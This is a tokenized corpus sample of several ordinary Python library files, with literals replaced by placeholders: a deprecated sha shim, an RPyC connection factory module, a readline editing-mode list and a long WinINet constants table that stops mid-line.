<s> import warnings <EOL> warnings . warn ( "<STR_LIT>" , <EOL> DeprecationWarning , <NUM_LIT:2> ) <EOL> from hashlib import sha1 as sha <EOL> new = sha <EOL> blocksize = <NUM_LIT:1> <EOL> digest_size = <NUM_LIT:20> <EOL> digestsize = <NUM_LIT:20> </s>
<s> """<STR_LIT>""" <EOL> from weakref import WeakValueDictionary <EOL> from Serving import DEFAULT_PORT <EOL> from Rpyc . Stream import SocketStream , PipeStream <EOL> from Rpyc . Channel import Channel <EOL> from Rpyc . Connection import Connection <EOL> from Rpyc . AsyncNetProxy import AsyncNetProxy <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> def SocketConnection ( host , port = DEFAULT_PORT ) : <EOL> """<STR_LIT>""" <EOL> return Connection ( Channel ( SocketStream . from_new_socket ( host , port ) ) ) <EOL> def PipeConnection ( incoming , outgoing ) : <EOL> """<STR_LIT>""" <EOL> return Connection ( Channel ( PipeStream ( incoming , outgoing ) ) ) <EOL> class LoginError ( Exception ) : <EOL> pass <EOL> def SecSocketConnection ( host , username , password , port = DEFAULT_PORT ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> stream = SocketStream . from_new_secure_socket ( host , port , username , password ) <EOL> except : <EOL> raise LoginError ( "<STR_LIT>" ) <EOL> return Connection ( Channel ( stream ) ) <EOL> _async_proxy_cache = WeakValueDictionary ( ) <EOL> def Async ( proxy ) : <EOL> """<STR_LIT>""" <EOL> key = id ( proxy ) <EOL> if key in _async_proxy_cache : <EOL> return _async_proxy_cache [ key ] <EOL> else : <EOL> new_proxy = AsyncNetProxy ( proxy ) <EOL> _async_proxy_cache [ key ] = new_proxy <EOL> return new_proxy </s>
<s> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> import emacs , notemacs , vi <EOL> editingmodes = [ emacs . EmacsMode , notemacs . NotEmacsMode , vi . ViMode ] </s>
<s> INTERNET_INVALID_PORT_NUMBER = <NUM_LIT:0> <EOL> INTERNET_DEFAULT_FTP_PORT = <NUM_LIT> <EOL> INTERNET_DEFAULT_GOPHER_PORT = <NUM_LIT> <EOL> INTERNET_DEFAULT_HTTP_PORT = <NUM_LIT> <EOL> INTERNET_DEFAULT_HTTPS_PORT = <NUM_LIT> <EOL> INTERNET_DEFAULT_SOCKS_PORT = <NUM_LIT> <EOL> INTERNET_MAX_HOST_NAME_LENGTH = <NUM_LIT> <EOL> INTERNET_MAX_USER_NAME_LENGTH = <NUM_LIT> <EOL> INTERNET_MAX_PASSWORD_LENGTH = <NUM_LIT> <EOL> INTERNET_MAX_PORT_NUMBER_LENGTH = <NUM_LIT:5> <EOL> INTERNET_MAX_PORT_NUMBER_VALUE = <NUM_LIT> <EOL> INTERNET_MAX_PATH_LENGTH = <NUM_LIT> <EOL> INTERNET_MAX_SCHEME_LENGTH = <NUM_LIT:32> <EOL> INTERNET_KEEP_ALIVE_ENABLED = <NUM_LIT:1> <EOL> INTERNET_KEEP_ALIVE_DISABLED = <NUM_LIT:0> <EOL> INTERNET_REQFLAG_FROM_CACHE = <NUM_LIT> <EOL> INTERNET_REQFLAG_ASYNC = <NUM_LIT> <EOL> INTERNET_REQFLAG_VIA_PROXY = <NUM_LIT> <EOL> INTERNET_REQFLAG_NO_HEADERS = <NUM_LIT> <EOL> INTERNET_REQFLAG_PASSIVE = <NUM_LIT> <EOL> INTERNET_REQFLAG_CACHE_WRITE_DISABLED = <NUM_LIT> <EOL> INTERNET_REQFLAG_NET_TIMEOUT = <NUM_LIT> <EOL> INTERNET_FLAG_RELOAD = ( - <NUM_LIT> ) <EOL> INTERNET_FLAG_RAW_DATA = <NUM_LIT> <EOL> INTERNET_FLAG_EXISTING_CONNECT = <NUM_LIT> <EOL> INTERNET_FLAG_ASYNC = <NUM_LIT> <EOL> INTERNET_FLAG_PASSIVE = <NUM_LIT> <EOL> INTERNET_FLAG_NO_CACHE_WRITE = <NUM_LIT> <EOL> INTERNET_FLAG_DONT_CACHE = INTERNET_FLAG_NO_CACHE_WRITE <EOL> INTERNET_FLAG_MAKE_PERSISTENT = <NUM_LIT> <EOL> INTERNET_FLAG_FROM_CACHE = <NUM_LIT> <EOL> INTERNET_FLAG_OFFLINE = INTERNET_FLAG_FROM_CACHE <EOL> INTERNET_FLAG_SECURE = <NUM_LIT> <EOL> INTERNET_FLAG_KEEP_CONNECTION = <NUM_LIT> <EOL> INTERNET_FLAG_NO_AUTO_REDIRECT = <NUM_LIT> <EOL> INTERNET_FLAG_READ_PREFETCH = <NUM_LIT> <EOL> INTERNET_FLAG_NO_COOKIES = <NUM_LIT> <EOL> INTERNET_FLAG_NO_AUTH = <NUM_LIT> <EOL> INTERNET_FLAG_RESTRICTED_ZONE = <NUM_LIT> <EOL> INTERNET_FLAG_CACHE_IF_NET_FAIL = <NUM_LIT> <EOL> INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP = <NUM_LIT> <EOL> INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS = <NUM_LIT> <EOL> INTERNET_FLAG_IGNORE_CERT_DATE_INVALID = <NUM_LIT> <EOL> INTERNET_FLAG_IGNORE_CERT_CN_INVALID = <NUM_LIT> <EOL> INTERNET_FLAG_RESYNCHRONIZE = <NUM_LIT> <EOL> INTERNET_FLAG_HYPERLINK = <NUM_LIT> <EOL> INTERNET_FLAG_NO_UI = <NUM_LIT> <EOL> INTERNET_FLAG_PRAGMA_NOCACHE = <NUM_LIT> <EOL> INTERNET_FLAG_CACHE_ASYNC = <NUM_LIT> <EOL> INTERNET_FLAG_FORMS_SUBMIT = <NUM_LIT> <EOL> INTERNET_FLAG_FWD_BACK = <NUM_LIT> <EOL> INTERNET_FLAG_NEED_FILE = <NUM_LIT> <EOL> INTERNET_FLAG_MUST_CACHE_REQUEST = INTERNET_FLAG_NEED_FILE <EOL> SECURITY_INTERNET_MASK = ( INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID | INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS | INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP ) <EOL> INTERNET_ERROR_MASK_INSERT_CDROM = <NUM_LIT> <EOL> INTERNET_ERROR_MASK_COMBINED_SEC_CERT = <NUM_LIT> <EOL> INTERNET_ERROR_MASK_NEED_MSN_SSPI_PKG = <NUM_LIT> <EOL> INTERNET_ERROR_MASK_LOGIN_FAILURE_DISPLAY_ENTITY_BODY = <NUM_LIT> <EOL> WININET_API_FLAG_ASYNC = <NUM_LIT> <EOL> WININET_API_FLAG_SYNC = <NUM_LIT> <EOL> WININET_API_FLAG_USE_CONTEXT = <NUM_LIT> <EOL> INTERNET_NO_CALLBACK = <NUM_LIT:0> <EOL> IDSI_FLAG_KEEP_ALIVE = <NUM_LIT> <EOL> IDSI_FLAG_SECURE = <NUM_LIT> <EOL> IDSI_FLAG_PROXY = <NUM_LIT> <EOL> IDSI_FLAG_TUNNEL = <NUM_LIT> <EOL> INTERNET_PER_CONN_FLAGS = <NUM_LIT:1> <EOL> INTERNET_PER_CONN_PROXY_SERVER = <NUM_LIT:2> <EOL> INTERNET_PER_CONN_PROXY_BYPASS = <NUM_LIT:3> <EOL> INTERNET_PER_CONN_AUTOCONFIG_URL = <NUM_LIT:4> <EOL> INTERNET_PER_CONN_AUTODISCOVERY_FLAGS = <NUM_LIT:5> <EOL> INTERNET_PER_CONN_AUTOCONFIG_SECONDARY_URL = <NUM_LIT:6> <EOL> INTERNET_PER_CONN_AUTOCONFIG_RELOAD_DELAY_MINS = <NUM_LIT:7> <EOL> INTERNET_PER_CONN_AUTOCONFIG_LAST_DETECT_TIME = <NUM_LIT:8> <EOL> INTERNET_PER_CONN_AUTOCONFIG_LAST_DETECT_URL = <NUM_LIT:9> <EOL> PROXY_TYPE_DIRECT = <NUM_LIT> <EOL> PROXY_TYPE_PROXY = <NUM_LIT> <EOL> PROXY_TYPE_AUTO_PROXY_URL = <NUM_LIT> <EOL> PROXY_TYPE_AUTO_DETECT = <NUM_LIT> <EOL> AUTO_PROXY_FLAG_USER_SET = <NUM_LIT> <EOL> AUTO_PROXY_FLAG_ALWAYS_DETECT = <NUM_LIT> <EOL> AUTO_PROXY_FLAG_DETECTION_RUN = <NUM_LIT> <EOL> AUTO_PROXY_FLAG_MIGRATED = <NUM_LIT> <EOL> AUTO_PROXY_FLAG_DONT_CACHE_PROXY_RESULT = <NUM_LIT> <EOL> AUTO_PROXY_FLAG_CACHE_INIT_RUN = <NUM_LIT> <EOL> AUTO_PROXY_FLAG_DETECTION_SUSPECT = <NUM_LIT> <EOL> ISO_FORCE_DISCONNECTED = <NUM_LIT> <EOL> INTERNET_RFC1123_FORMAT = <NUM_LIT:0> <EOL> INTERNET_RFC1123_BUFSIZE = <NUM_LIT:30> <EOL> ICU_ESCAPE = ( - <NUM_LIT> ) <EOL> ICU_USERNAME = <NUM_LIT> <EOL> ICU_NO_ENCODE = <NUM_LIT> <EOL> ICU_DECODE = <NUM_LIT> <EOL> ICU_NO_META = <NUM_LIT> <EOL> ICU_ENCODE_SPACES_ONLY = <NUM_LIT> <EOL> ICU_BROWSER_MODE = <NUM_LIT> <EOL> ICU_ENCODE_PERCENT = <NUM_LIT> <EOL> INTERNET_OPEN_TYPE_PRECONFIG = <NUM_LIT:0> <EOL> INTERNET_OPEN_TYPE_DIRECT = <NUM_LIT:1> <EOL> INTERNET_OPEN_TYPE_PROXY = <NUM_LIT:3> <EOL> INTERNET_OPEN_TYPE_PRECONFIG_WITH_NO_AUTOPROXY = <NUM_LIT:4> <EOL> PRE_CONFIG_INTERNET_ACCESS = INTERNET_OPEN_TYPE_PRECONFIG <EOL> LOCAL_INTERNET_ACCESS = INTERNET_OPEN_TYPE_DIRECT <EOL> CERN_PROXY_INTERNET_ACCESS = INTERNET_OPEN_TYPE_PROXY <EOL> INTERNET_SERVICE_FTP = <NUM_LIT:1> <EOL> INTERNET_SERVICE_GOPHER = <NUM_LIT:2> <EOL> INTERNET_SERVICE_HTTP = <NUM_LIT:3> <EOL> IRF_ASYNC = WININET_API_FLAG_ASYNC <EOL> IRF_SYNC = WININET_API_FLAG_SYNC <EOL> IRF_USE_CONTEXT = WININET_API_FLAG_USE_CONTEXT <EOL> IRF_NO_WAIT = <NUM_LIT> <EOL> ISO_GLOBAL = <NUM_LIT> <EOL> ISO_REGISTRY = <NUM_LIT> <EOL> ISO_VALID_FLAGS = ( ISO_GLOBAL | ISO_REGISTRY ) <EOL> INTERNET_OPTION_CALLBACK = <NUM_LIT:1> <EOL> INTERNET_OPTION_CONNECT_TIMEOUT = <NUM_LIT:2> <EOL> INTERNET_OPTION_CONNECT_RETRIES = <NUM_LIT:3> <EOL> INTERNET_OPTION_CONNECT_BACKOFF = <NUM_LIT:4> <EOL> INTERNET_OPTION_SEND_TIMEOUT = <NUM_LIT:5> <EOL> INTERNET_OPTION_CONTROL_SEND_TIMEOUT = INTERNET_OPTION_SEND_TIMEOUT <EOL> INTERNET_OPTION_RECEIVE_TIMEOUT = <NUM_LIT:6> <EOL> INTERNET_OPTION_CONTROL_RECEIVE_TIMEOUT = INTERNET_OPTION_RECEIVE_TIMEOUT <EOL> INTERNET_OPTION_DATA_SEND_TIMEOUT = <NUM_LIT:7> <EOL> INTERNET_OPTION_DATA_RECEIVE_TIMEOUT = <NUM_LIT:8> <EOL> INTERNET_OPTION_HANDLE_TYPE = <NUM_LIT:9> <EOL> INTERNET_OPTION_LISTEN_TIMEOUT = <NUM_LIT:11> <EOL> INTERNET_OPTION_READ_BUFFER_SIZE = <NUM_LIT:12> <EOL> INTERNET_OPTION_WRITE_BUFFER_SIZE = <NUM_LIT> <EOL> INTERNET_OPTION_ASYNC_ID = <NUM_LIT:15> <EOL> INTERNET_OPTION_ASYNC_PRIORITY = <NUM_LIT:16> <EOL> INTERNET_OPTION_PARENT_HANDLE = <NUM_LIT> <EOL> INTERNET_OPTION_KEEP_CONNECTION = <NUM_LIT> <EOL> INTERNET_OPTION_REQUEST_FLAGS = <NUM_LIT> <EOL> INTERNET_OPTION_EXTENDED_ERROR = <NUM_LIT> <EOL> INTERNET_OPTION_OFFLINE_MODE = <NUM_LIT> <EOL> INTERNET_OPTION_CACHE_STREAM_HANDLE = <NUM_LIT> <EOL> INTERNET_OPTION_USERNAME = <NUM_LIT> <EOL> INTERNET_OPTION_PASSWORD = <NUM_LIT> <EOL> INTERNET_OPTION_ASYNC = <NUM_LIT:30> <EOL> INTERNET_OPTION_SECURITY_FLAGS = <NUM_LIT> <EOL> INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT = <NUM_LIT:32> <EOL> INTERNET_OPTION_DATAFILE_NAME = <NUM_LIT> <EOL> INTERNET_OPTION_URL = <NUM_LIT> <EOL> INTERNET_OPTION_SECURITY_CERTIFICATE = <NUM_LIT> <EOL> INTERNET_OPTION_SECURITY_KEY_BITNESS = <NUM_LIT> <EOL> INTERNET_OPTION_REFRESH = <NUM_LIT> <EOL> INTERNET_OPTION_PROXY = <NUM_LIT> <EOL> INTERNET_OPTION_SETTINGS_CHANGED = <NUM_LIT> <EOL> INTERNET_OPTION_VERSION = <NUM_LIT> <EOL> INTERNET_OPTION_USER_AGENT = <NUM_LIT> <EOL> INTERNET_OPTION_END_BROWSER_SESSION = <NUM_LIT> <EOL> INTERNET_OPTION_PROXY_USERNAME = <NUM_LIT> <EOL> INTERNET_OPTION_PROXY_PASSWORD = <NUM_LIT> <EOL> INTERNET_OPTION_CONTEXT_VALUE = <NUM_LIT> <EOL> INTERNET_OPTION_CONNECT_LIMIT = <NUM_LIT> <EOL> INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT = <NUM_LIT> <EOL> INTERNET_OPTION_POLICY = <NUM_LIT> <EOL> INTERNET_OPTION_DISCONNECTED_TIMEOUT = <NUM_LIT> <EOL> INTERNET_OPTION_CONNECTED_STATE = <NUM_LIT:50> <EOL> INTERNET_OPTION_IDLE_STATE = <NUM_LIT> <EOL> INTERNET_OPTION_OFFLINE_SEMANTICS = <NUM_LIT> <EOL> INTERNET_OPTION_SECONDARY_CACHE_KEY = <NUM_LIT> <EOL> INTERNET_OPTION_CALLBACK_FILTER = <NUM_LIT> <EOL> INTERNET_OPTION_CONNECT_TIME = <NUM_LIT> <EOL> INTERNET_OPTION_SEND_THROUGHPUT = <NUM_LIT> <EOL> INTERNET_OPTION_RECEIVE_THROUGHPUT = <NUM_LIT> <EOL> INTERNET_OPTION_REQUEST_PRIORITY = <NUM_LIT> <EOL> INTERNET_OPTION_HTTP_VERSION = <NUM_LIT> <EOL> INTERNET_OPTION_RESET_URLCACHE_SESSION = <NUM_LIT> <EOL> INTERNET_OPTION_ERROR_MASK = <NUM_LIT> <EOL> INTERNET_OPTION_FROM_CACHE_TIMEOUT = <NUM_LIT> <EOL> INTERNET_OPTION_BYPASS_EDITED_ENTRY = <NUM_LIT:64> <EOL> INTERNET_OPTION_DIAGNOSTIC_SOCKET_INFO = <NUM_LIT> <EOL> INTERNET_OPTION_CODEPAGE = <NUM_LIT> <EOL> INTERNET_OPTION_CACHE_TIMESTAMPS = <NUM_LIT> <EOL> INTERNET_OPTION_DISABLE_AUTODIAL = <NUM_LIT> <EOL> INTERNET_OPTION_MAX_CONNS_PER_SERVER = <NUM_LIT> <EOL> INTERNET_OPTION_MAX_CONNS_PER_1_0_SERVER = <NUM_LIT> <EOL> INTERNET_OPTION_PER_CONNECTION_OPTION = <NUM_LIT> <EOL> INTERNET_OPTION_DIGEST_AUTH_UNLOAD = <NUM_LIT> <EOL> INTERNET_OPTION_IGNORE_OFFLINE = <NUM_LIT> <EOL> INTERNET_OPTION_IDENTITY = <NUM_LIT> <EOL> INTERNET_OPTION_REMOVE_IDENTITY = <NUM_LIT> <EOL> INTERNET_OPTION_ALTER_IDENTITY = <NUM_LIT> <EOL> INTERNET_OPTION_SUPPRESS_BEHAVIOR = <NUM_LIT> <EOL> INTERNET_OPTION_AUTODIAL_MODE = <NUM_LIT> <EOL> INTERNET_OPTION_AUTODIAL_CONNECTION = <NUM_LIT> <EOL> INTERNET_OPTION_CLIENT_CERT_CONTEXT = <NUM_LIT> <EOL> INTERNET_OPTION_AUTH_FLAGS = <NUM_LIT> <EOL> INTERNET_OPTION_COOKIES_3RD_PARTY = <NUM_LIT> <EOL> INTERNET_OPTION_DISABLE_PASSPORT_AUTH = <NUM_LIT> <EOL> INTERNET_OPTION_SEND_UTF8_SERVERNAME_TO_PROXY = <NUM_LIT> <EOL> INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT = <NUM_LIT> <EOL> INTERNET_OPTION_ENABLE_PASSPORT_AUTH = <NUM_LIT> <EOL> INTERNET_OPTION_HIBERNATE_INACTIVE_WORKER_THREADS = <NUM_LIT> <EOL> INTERNET_OPTION_ACTIVATE_WORKER_THREADS = <NUM_LIT> <EOL> INTERNET_OPTION_RESTORE_WORKER_THREAD_DEFAULTS = <NUM_LIT> <EOL> INTERNET_OPTION_SOCKET_SEND_BUFFER_LENGTH = <NUM_LIT> <EOL> INTERNET_OPTION_PROXY_SETTINGS_CHANGED = <NUM_LIT> <EOL> INTERNET_FIRST_OPTION = INTERNET_OPTION_CALLBACK <EOL> INTERNET_LAST_OPTION = INTERNET_OPTION_PROXY_SETTINGS_CHANGED <EOL> INTERNET_PRIORITY_FOREGROUND = <NUM_LIT:1000> <EOL> INTERNET_HANDLE_TYPE_INTERNET = <NUM_LIT:1> <EOL> INTERNET_HANDLE_TYPE_CONNECT_FTP = <NUM_LIT:2> <EOL> INTERNET_HANDLE_TYPE_CONNECT_GOPHER = <NUM_LIT:3> <EOL> INTERNET_HANDLE_TYPE_CONNECT_HTTP = <NUM_LIT:4> <EOL> INTERNET_HANDLE_TYPE_FTP_FIND = <NUM_LIT:5> <EOL> INTERNET_HANDLE_TYPE_FTP_FIND_HTML = <NUM_LIT:6> <EOL> INTERNET_HANDLE_TYPE_FTP_FILE = <NUM_LIT:7> <EOL> INTERNET_HANDLE_TYPE_FTP_FILE_HTML = <NUM_LIT:8> <EOL> INTERNET_HANDLE_TYPE_GOPHER_FIND = <NUM_LIT:9> <EOL> INTERNET_HANDLE_TYPE_GOPHER_FIND_HTML = <NUM_LIT:10> <EOL> INTERNET_HANDLE_TYPE_GOPHER_FILE = <NUM_LIT:11> <EOL> INTERNET_HANDLE_TYPE_GOPHER_FILE_HTML = <NUM_LIT:12> <EOL> INTERNET_HANDLE_TYPE_HTTP_REQUEST = <NUM_LIT> <EOL> INTERNET_HANDLE_TYPE_FILE_REQUEST = <NUM_LIT> <EOL> AUTH_FLAG_DISABLE_NEGOTIATE = <NUM_LIT> <EOL> AUTH_FLAG_ENABLE_NEGOTIATE = <NUM_LIT> <EOL> SECURITY_FLAG_SECURE = <NUM_LIT> <EOL> SECURITY_FLAG_STRENGTH_WEAK = <NUM_LIT> <EOL> SECURITY_FLAG_STRENGTH_MEDIUM = <NUM_LIT> <EOL> SECURITY_FLAG_STRENGTH_STRONG = <NUM_LIT> <EOL> SECURITY_FLAG_UNKNOWNBIT = ( - <NUM_LIT> ) <EOL> SECURITY_FLAG_FORTEZZA = <NUM_LIT> <EOL> SECURITY_FLAG_NORMALBITNESS = SECURITY_FLAG_STRENGTH_WEAK <EOL> SECURITY_FLAG_SSL = <NUM_LIT> <EOL> SECURITY_FLAG_SSL3 = <NUM_LIT> <EOL> SECURITY_FLAG_PCT = <NUM_LIT> <EOL> SECURITY_FLAG_PCT4 = <NUM_LIT> <EOL> SECURITY_FLAG_IETFSSL4 = <NUM_LIT> <EOL> SECURITY_FLAG_40BIT = SECURITY_FLAG_STRENGTH_WEAK <EOL> SECURITY_FLAG_128BIT = SECURITY_FLAG_STRENGTH_STRONG <EOL> SECURITY_FLAG_56BIT = SECURITY_FLAG_STRENGTH_MEDIUM <EOL> SECURITY_FLAG_IGNORE_REVOCATION = <NUM_LIT> <EOL> SECURITY_FLAG_IGNORE_UNKNOWN_CA = <NUM_LIT> <EOL> SECURITY_FLAG_IGNORE_WRONG_USAGE = <NUM_LIT> <EOL> SECURITY_FLAG_IGNORE_CERT_CN_INVALID = INTERNET_FLAG_IGNORE_CERT_CN_INVALID <EOL> SECURITY_FLAG_IGNORE_CERT_DATE_INVALID = INTERNET_FLAG_IGNORE_CERT_DATE_INVALID <EOL> SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTPS = INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS <EOL> SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTP = INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP <EOL> SECURITY_SET_MASK = ( SECURITY_FLAG_IGNORE_REVOCATION | SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID | SECURITY_FLAG_IGNORE_WRONG_USAGE ) <EOL> AUTODIAL_MODE_NEVER = <NUM_LIT:1> <EOL> AUTODIAL_MODE_ALWAYS = <NUM_LIT:2> <EOL> AUTODIAL_MODE_NO_NETWORK_PRESENT = <NUM_LIT:4> <EOL> INTERNET_STATUS_RESOLVING_NAME = <NUM_LIT:10> <EOL> INTERNET_STATUS_NAME_RESOLVED = <NUM_LIT:11> <EOL> INTERNET_STATUS_CONNECTING_TO_SERVER = <NUM_LIT:20> <EOL> INTERNET_STATUS_CONNECTED_TO_SERVER = <NUM_LIT> <EOL> INTERNET_STATUS_SENDING_REQUEST = <NUM_LIT:30> <EOL> INTERNET_STATUS_REQUEST_SENT = <NUM_LIT> <EOL> INTERNET_STATUS_RECEIVING_RESPONSE = <NUM_LIT> <EOL> INTERNET_STATUS_RESPONSE_RECEIVED = <NUM_LIT> <EOL> INTERNET_STATUS_CTL_RESPONSE_RECEIVED = <NUM_LIT> <EOL> INTERNET_STATUS_PREFETCH = <NUM_LIT> <EOL> INTERNET_STATUS_CLOSING_CONNECTION = <NUM_LIT:50> <EOL> INTERNET_STATUS_CONNECTION_CLOSED = <NUM_LIT> <EOL> INTERNET_STATUS_HANDLE_CREATED = <NUM_LIT> <EOL> INTERNET_STATUS_HANDLE_CLOSING = <NUM_LIT> <EOL> INTERNET_STATUS_DETECTING_PROXY = <NUM_LIT> <EOL> INTERNET_STATUS_REQUEST_COMPLETE = <NUM_LIT:100> <EOL> INTERNET_STATUS_REDIRECT = <NUM_LIT> <EOL> INTERNET_STATUS_INTERMEDIATE_RESPONSE = <NUM_LIT> <EOL> INTERNET_STATUS_USER_INPUT_REQUIRED = <NUM_LIT> <EOL> INTERNET_STATUS_STATE_CHANGE = <NUM_LIT:200> <EOL> INTERNET_STATUS_COOKIE_SENT = <NUM_LIT> <EOL> INTERNET_STATUS_COOKIE_RECEIVED = <NUM_LIT> <EOL> INTERNET_STATUS_PRIVACY_IMPACTED = <NUM_LIT> <EOL> INTERNET_STATUS_P3P_HEADER = <NUM_LIT> <EOL> INTERNET_STATUS_P3P_POLICYREF = <NUM_LIT> <EOL> INTERNET_STATUS_COOKIE_HISTORY = <NUM_LIT> <EOL> INTERNET_STATE_CONNECTED = <NUM_LIT> <EOL> INTERNET_STATE_DISCONNECTED = <NUM_LIT> <EOL> INTERNET_STATE_DISCONNECTED_BY_USER = <NUM_LIT> <EOL> INTERNET_STATE_IDLE = <NUM_LIT> <EOL> INTERNET_STATE_BUSY = <NUM_LIT> <EOL> FTP_TRANSFER_TYPE_UNKNOWN = <NUM_LIT> <EOL> FTP_TRANSFER_TYPE_ASCII = <NUM_LIT> <EOL> FTP_TRANSFER_TYPE_BINARY = <NUM_LIT> <EOL> FTP_TRANSFER_TYPE_MASK = ( FTP_TRANSFER_TYPE_ASCII | FTP_TRANSFER_TYPE_BINARY ) <EOL> MAX_GOPHER_DISPLAY_TEXT = <NUM_LIT> <EOL> MAX_GOPHER_SELECTOR_TEXT = <NUM_LIT> <EOL> MAX_GOPHER_HOST_NAME = INTERNET_MAX_HOST_NAME_LENGTH <EOL> MAX_GOPHER_LOCATOR_LENGTH = ( <NUM_LIT:1> + MAX_GOPHER_DISPLAY_TEXT + <NUM_LIT:1> + MAX_GOPHER_SELECTOR_TEXT + <NUM_LIT:1> + MAX_GOPHER_HOST_NAME + <NUM_LIT:1> + INTERNET_MAX_PORT_NUMBER_LENGTH + <NUM_LIT:1> + <NUM_LIT:1> + <NUM_LIT:2> ) <EOL> GOPHER_TYPE_TEXT_FILE = <NUM_LIT> <EOL> GOPHER_TYPE_DIRECTORY = <NUM_LIT> <EOL> GOPHER_TYPE_CSO = <NUM_LIT> <EOL> GOPHER_TYPE_ERROR = <NUM_LIT> <EOL> GOPHER_TYPE_MAC_BINHEX = <NUM_LIT> <EOL> GOPHER_TYPE_DOS_ARCHIVE = <NUM_LIT> <EOL> GOPHER_TYPE_UNIX_UUENCODED = <NUM_LIT> <EOL> GOPHER_TYPE_INDEX_SERVER = <NUM_LIT> <EOL> GOPHER_TYPE_TELNET = <NUM_LIT> <EOL> GOPHER_TYPE_BINARY = <NUM_LIT> <EOL> GOPHER_TYPE_REDUNDANT = <NUM_LIT> <EOL> GOPHER_TYPE_TN3270 = <NUM_LIT> <EOL> GOPHER_TYPE_GIF = <NUM_LIT> <EOL> GOPHER_TYPE_IMAGE = <NUM_LIT> <EOL> GOPHER_TYPE_BITMAP = <NUM_LIT> <EOL> GOPHER_TYPE_MOVIE = <NUM_LIT> <EOL> GOPHER_TYPE_SOUND = <NUM_LIT> <EOL> GOPHER_TYPE_HTML = <NUM_LIT> <EOL> GOPHER_TYPE_PDF = <NUM_LIT> <EOL> GOPHER_TYPE_CALENDAR = <NUM_LIT> <EOL> GOPHER_TYPE_INLINE = <NUM_LIT> <EOL> GOPHER_TYPE_UNKNOWN = <NUM_LIT> <EOL> GOPHER_TYPE_ASK = <NUM_LIT> <EOL> GOPHER_TYPE_GOPHER_PLUS = ( - <NUM_LIT> ) <EOL> GOPHER_TYPE_FILE_MASK = ( GOPHER_TYPE_TEXT_FILE | GOPHER_TYPE_MAC_BINHEX | GOPHER_TYPE_DOS_ARCHIVE | GOPHER_TYPE_UNIX_UUENCODED | GOPHER_TYPE_BINARY | GOPHER_TYPE_GIF | GOPHER_TYPE_IMAGE | GOPHER_TYPE_BITMAP | GOPHER_TYPE_MOVIE | GOPHER_TYPE_SOUND | GOPHER_TYPE_HTML | GOPHER_TYPE_PDF | GOPHER_TYPE_CALENDAR | GOPHER_TYPE_INLINE ) <EOL> MAX_GOPHER_CATEGORY_NAME = <NUM_LIT> <EOL> MAX_GOPHER_ATTRIBUTE_NAME = <NUM_LIT> <EOL> MIN_GOPHER_ATTRIBUTE_LENGTH = <NUM_LIT> <EOL> GOPHER_ATTRIBUTE_ID_BASE = ( - <NUM_LIT> ) <EOL> GOPHER_CATEGORY_ID_ALL = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:1> ) <EOL> GOPHER_CATEGORY_ID_INFO = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:2> ) <EOL> GOPHER_CATEGORY_ID_ADMIN = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:3> ) <EOL> GOPHER_CATEGORY_ID_VIEWS = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:4> ) <EOL> GOPHER_CATEGORY_ID_ABSTRACT = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:5> ) <EOL> GOPHER_CATEGORY_ID_VERONICA = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:6> ) <EOL> GOPHER_CATEGORY_ID_ASK = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:7> ) <EOL> GOPHER_CATEGORY_ID_UNKNOWN = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:8> ) <EOL> GOPHER_ATTRIBUTE_ID_ALL = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:9> ) <EOL> GOPHER_ATTRIBUTE_ID_ADMIN = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:10> ) <EOL> GOPHER_ATTRIBUTE_ID_MOD_DATE = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:11> ) <EOL> GOPHER_ATTRIBUTE_ID_TTL = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:12> ) <EOL> GOPHER_ATTRIBUTE_ID_SCORE = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT> ) <EOL> GOPHER_ATTRIBUTE_ID_RANGE = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT> ) <EOL> GOPHER_ATTRIBUTE_ID_SITE = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:15> ) <EOL> GOPHER_ATTRIBUTE_ID_ORG = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:16> ) <EOL> GOPHER_ATTRIBUTE_ID_LOCATION = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT> ) <EOL> GOPHER_ATTRIBUTE_ID_GEOG = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT> ) <EOL> GOPHER_ATTRIBUTE_ID_TIMEZONE = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT> ) <EOL> GOPHER_ATTRIBUTE_ID_PROVIDER = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:20> ) <EOL> GOPHER_ATTRIBUTE_ID_VERSION = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT> ) <EOL> GOPHER_ATTRIBUTE_ID_ABSTRACT = ( GOPHER_ATTRIBUTE_ID_BASE + 